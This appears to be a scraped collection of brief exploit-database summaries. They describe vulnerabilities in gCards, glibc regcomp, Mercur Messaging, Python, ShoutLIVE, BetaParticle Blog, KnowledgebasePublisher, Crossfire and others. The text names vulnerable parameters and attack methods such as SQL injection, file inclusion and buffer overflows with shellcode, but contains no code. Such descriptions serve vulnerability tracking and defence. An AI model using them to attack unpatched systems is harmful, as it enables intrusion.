gCards version 1.45 is vulnerable to Arbitrary Local Inclusion and SQL Injection. The Arbitrary Local Inclusion vulnerability exists due to insufficient sanitization of user-supplied input in the 'setLang' parameter in 'inc/setLang.php' script. This can be exploited to include arbitrary local files by passing directory traversal strings. The SQL Injection vulnerability exists due to insufficient sanitization of user-supplied input in the 'username' parameter in 'admin/loginfunction.php' script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The field 'mail' in reg.php is used directly in a SQL query which can be used to deduce the result of some sql querys according to the error messages returned. The exploit test the characters of the md5 hash one by one using a special query.
The GNU C library is used as the C library in the GNU system and most systems with the Linux kernel. regcomp() is used to compile a regular expression into a form that is suitable for subsequent regexec() searches. The main problem exists in regcomp(3) function of GNU libc implementation. If we use '{', token type will be OP_OPEN_DUP_NUM. The function parse_dup_op() is used to parse repetition operators like '*', '+', '{1,3}' etc. The function fetch_number() is used to convert the value. If the value is greater than RE_DUP_MAX, it will cause an overflow.
Tim Taylor has discovered a vulnerability in Mercur Messaging 2005, which can be exploited by malicious people and by malicious users to cause a DoS (Denial of Service) or to compromise a vulnerable system. The vulnerability is caused due to boundary errors within the handling of IMAP commands. This can be exploited to cause a stack-based buffer overflow via overly long arguments passed to the LOGIN and SELECT commands. Other commands may also be affected. Successful exploitation allows arbitrary code execution. The vulnerability has been confirmed in version 5.0 SP3. Other versions may also be affected.
The vulnerability exists due to failure in the 'index.php?admin=my_account' script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability and change administrator password. The vulnerability also exists due to failure in the 'index.php?admin=static_pages_edit&pk=home' script to properly sanitize user-supplied input in 'page_text' variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Python <= 2.4.2 is vulnerable to a local stack overflow vulnerability. This exploit is against VA Space Randomization. The bug was found and developed by dx/vaxen (Gotfault Security) and posidron (Tripbit Research Group). The exploit creates a directory with a long path name and then executes a python script in that directory. The python script contains shellcode which is then executed.
A vulnerability in ShoutLIVE <= 1.1.0 allows remote attackers to execute arbitrary code via a crafted POST request to savesettings.php, which is then executed by settings.php.
BetaParticle Blog version 6.0 and prior are vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability to gain access to the admin panel of the blog. The vulnerability is due to the application not properly sanitizing user-supplied input to the 'fldGalleryID' parameter in the 'template_gallery_detail.asp' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. Successful exploitation will allow the attacker to gain access to the admin panel of the blog.
This exploit allows an attacker to execute arbitrary code on a vulnerable server running KnowledgebasePublisher 1.2. The exploit takes advantage of a vulnerability in the PageController.php file, which allows an attacker to inject arbitrary code into the 'dir' parameter. The exploit then sends a GET request to the vulnerable server, which executes the injected code.
This exploit is a remote buffer overflow vulnerability in the Crossfire-Server <= 1.9.0. It allows an attacker to execute arbitrary code on the vulnerable system by sending a specially crafted packet to the server. The exploit uses a jmp *%eax instruction to jump to the shellcode, which is either a bind shell or a connectback shell.
Services By CQR